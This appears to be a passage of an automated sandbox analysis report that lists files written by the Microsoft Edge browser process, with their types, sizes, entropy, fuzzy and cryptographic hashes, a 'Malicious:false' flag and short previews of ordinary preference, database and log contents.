                                                                                                                                                                                                                                                                                  SHA-512:0FBE007ACC57F582D7DF464B68B4C32603229D97CCE44DF65F7474E9BBC3738FD8766066647591AD333666D460BCB37A599F099919045BA81E71CF8E5E2F7080
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18298), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):18299
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.446486792779707
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JhCa2kCPVtCYhYojREy6VrhU4bIj8/pj+FnYQwp1VEx:sV6LAJu43JAa/CdtBay65lpUYQwjV0
                                                                                                                                                                                                                                                                                  MD5:6CCF100BFCCC9EC542532E82C69627A7
                                                                                                                                                                                                                                                                                  SHA1:F7555647F47AE4D1819D8735C440BFE4B58EC3C5
                                                                                                                                                                                                                                                                                  SHA-256:A12768708532AC99247BEBB057868824FA08128DA6D37CE955FDC280C5C3266F
                                                                                                                                                                                                                                                                                  SHA-512:69AB10064E4D2A14B4DFAE134B00B83540D8B2B69975701639CD8E767CF4D8752C8C6F3F033247F1BABBF230F1BC9A7640E548DDB71CB3F34A679F456604C370
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17533), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17534
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.40700869968535
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JhCa2keYhYojREy6VrhU4bIj8/pj+FnYQwpvEj1f:sV6LAJu43JAa/day65lpUYQw10
                                                                                                                                                                                                                                                                                  MD5:CCB58BB1DCD87213ED46A1AE40E2B921
                                                                                                                                                                                                                                                                                  SHA1:6265C190C359A61787C99C11D089865CDDD5A1BF
                                                                                                                                                                                                                                                                                  SHA-256:CFCB15F8FF557104C4A1663C923C56524C7F52177F090C6B40B9494724E240C6
                                                                                                                                                                                                                                                                                  SHA-512:022B3ECD5832D38B5C4A21A6C5A9818B2F599B454399D00671E673C50B118EBFFDC52E0D5FE39F554F6BDBE6826279667F32D0576483E0F0F7AEE287DFB0C365
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.35226517389931394
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                                                                                                                                                  MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                                                                                                                                                  SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                                                                                                                                                  SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                                                                                                                                                  SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08697040985339087
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:GEl/OUyxz4llEl/OUyxr/B9XHl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/UnnE:bt7yK/Et7yBbFnnnnnnnnnnnpwE
                                                                                                                                                                                                                                                                                  MD5:27881A7EB2935E3560A7557BE9DEE5B3
                                                                                                                                                                                                                                                                                  SHA1:6D40D19E472E385001803D8BDF3721BA52265135
                                                                                                                                                                                                                                                                                  SHA-256:24E92CE09CC783FAEC45EBF4E31F9B1BEADC8D079B137818C2456E37A9627B1D
                                                                                                                                                                                                                                                                                  SHA-512:5D312988A77C3DF29804284B11A869002D637A8F41DB7EBE032DF52AB4E7EEBE5635BBBDEF77F6D9C0F10B810BDB7560C7F1FBD4C2B7CAE3808D81D1342374B8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..-.............<.........$.)....q&.I..x../..c..-.............<.........$.)....q&.I..x../..c........8...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):247232
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8299590288879338
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:FSYV77/blWswQ898790iN4b81aVv8vy1y0jyMyb1yHxyqO:Sy+7M
                                                                                                                                                                                                                                                                                  MD5:C00772D3291283A47EF44BF0C9C3DF85
                                                                                                                                                                                                                                                                                  SHA1:74D86ECB3D774487628B513D7195A971862D51A3
                                                                                                                                                                                                                                                                                  SHA-256:640327AE371F29F48A45DCB37ABF90DBAC603BF92D3C54EED1303BE964E9C8FF
                                                                                                                                                                                                                                                                                  SHA-512:BCF0ABBD2D431B6752C56A664CCD55771A3DE6CB496C31CFAC21B29898B6DF22058A8654E28EA3D2013CF58689C4B1B5BE454A889876F0587E50D0C4766B9350
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:7....-............q&.I...X..!>...........q&.I...l.VT>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):240
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.473513848069007
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:VVXntjQPEnjQ8C+mll/3r6P/FDdllomalJtlfseGKT9rcQ6xpLz+VLL1FUL1FUL1:/XntM+PTmlt3illohzPsedhOhsEE
                                                                                                                                                                                                                                                                                  MD5:5F7EACF58D67A8C548AEE98647DAD95B
                                                                                                                                                                                                                                                                                  SHA1:0D1CF62CB741F589CDE3E186FCF61E6D58D9A119
                                                                                                                                                                                                                                                                                  SHA-256:055CC9F5CFC00B6ED00BFC9E592A3FA64D470A19CD9318E29DC2B6D294C7AE8F
                                                                                                                                                                                                                                                                                  SHA-512:DB56CD2F6C7005BB548A813D70AA6F97AAD0C74A77AC3FCC8436E854E6C9B7ECD11A1EFE383AC490656868526EFF64A020199C649769FBBBC3C9B69A0BA51432
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1.t.;...............#38_h.......6.Z..W.F..........................e..b0................39_config..........6.....n ...1V.e................V.e................V.e................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.143522572379652
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVC6q2Pwkn23oH+TcwtfrK+IFUtfCGjXZmw5CGjFkwOwkn23oH+TcwtfrUeLJ:7VBvYfYeb23FUtfRjX/5RjF5JfYeb3J
                                                                                                                                                                                                                                                                                  MD5:99BDFB8BF8B0400F83D5E790277D9061
                                                                                                                                                                                                                                                                                  SHA1:3318F6AE3C9783421862E1355269273DB23BF575
                                                                                                                                                                                                                                                                                  SHA-256:39F5AB55FED51FECAE6902FCF122C356050C5FD7261B2DF788FC1F25F8363D16
                                                                                                                                                                                                                                                                                  SHA-512:32650540C56DA0D9477E468AB54ED6842FF3FE9EDDE106661388A62C646286C63394A833FAD237F466CE800E5CE4E8851DB6E390246686B92BB45D0578EC28A2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.123 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/03-17:33:01.124 1ad0 Recovering log #3.2025/01/03-17:33:01.124 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.143522572379652
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVC6q2Pwkn23oH+TcwtfrK+IFUtfCGjXZmw5CGjFkwOwkn23oH+TcwtfrUeLJ:7VBvYfYeb23FUtfRjX/5RjF5JfYeb3J
                                                                                                                                                                                                                                                                                  MD5:99BDFB8BF8B0400F83D5E790277D9061
                                                                                                                                                                                                                                                                                  SHA1:3318F6AE3C9783421862E1355269273DB23BF575
                                                                                                                                                                                                                                                                                  SHA-256:39F5AB55FED51FECAE6902FCF122C356050C5FD7261B2DF788FC1F25F8363D16
                                                                                                                                                                                                                                                                                  SHA-512:32650540C56DA0D9477E468AB54ED6842FF3FE9EDDE106661388A62C646286C63394A833FAD237F466CE800E5CE4E8851DB6E390246686B92BB45D0578EC28A2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.123 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/03-17:33:01.124 1ad0 Recovering log #3.2025/01/03-17:33:01.124 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):651
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.965766502515221
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUteza//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEs:G0nYUtezaD3RUovhC+lvBOL+s
                                                                                                                                                                                                                                                                                  MD5:AC0683AD2C2D32830BD93D730BAEC5F9
                                                                                                                                                                                                                                                                                  SHA1:5B9A498B400461FC15253D5B0C0D996B0085A60B
                                                                                                                                                                                                                                                                                  SHA-256:AE61B3CB8C5597A5012EEB71311C4B67FC3F3C08704F27D5A446E7B3D79C1DC1
                                                                                                                                                                                                                                                                                  SHA-512:E765D535DAD757B6AECDB880954FCDFBE394F28C1955679BF6121BFA11B869A1CFD694329B75124E084B252E79129F41F8005B018EAD6A473FD3423B07DD6D40
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.126029839518326
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCRq2Pwkn23oH+TcwtfrzAdIFUtfCVZZmw5CekwOwkn23oH+TcwtfrzILJ:7VOvYfYeb9FUtfQZ/535JfYeb2J
                                                                                                                                                                                                                                                                                  MD5:4A656001BF82E19735BEF0B03713D392
                                                                                                                                                                                                                                                                                  SHA1:EDB25A4B3222D5646712B849FA53DF7643C0EDD6
                                                                                                                                                                                                                                                                                  SHA-256:2044FAD3FC1EC4671275F3E4920477992DBE8D5EAC8A2FDC0CEFD1E7249EB2C4
                                                                                                                                                                                                                                                                                  SHA-512:0A5639F7885D56B307B3DD74B7965F04F638E212604277550535F2BB4410B6A3AACC5712F61069CB9F3933A14F21477CF9E6ACFD17B020C500C2C3C2DE4AD02F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.034 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/03-17:33:01.035 1ad0 Recovering log #3.2025/01/03-17:33:01.036 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.126029839518326
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCRq2Pwkn23oH+TcwtfrzAdIFUtfCVZZmw5CekwOwkn23oH+TcwtfrzILJ:7VOvYfYeb9FUtfQZ/535JfYeb2J
                                                                                                                                                                                                                                                                                  MD5:4A656001BF82E19735BEF0B03713D392
                                                                                                                                                                                                                                                                                  SHA1:EDB25A4B3222D5646712B849FA53DF7643C0EDD6
                                                                                                                                                                                                                                                                                  SHA-256:2044FAD3FC1EC4671275F3E4920477992DBE8D5EAC8A2FDC0CEFD1E7249EB2C4
                                                                                                                                                                                                                                                                                  SHA-512:0A5639F7885D56B307B3DD74B7965F04F638E212604277550535F2BB4410B6A3AACC5712F61069CB9F3933A14F21477CF9E6ACFD17B020C500C2C3C2DE4AD02F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.034 1ad0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/03-17:33:01.035 1ad0 Recovering log #3.2025/01/03-17:33:01.036 1ad0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
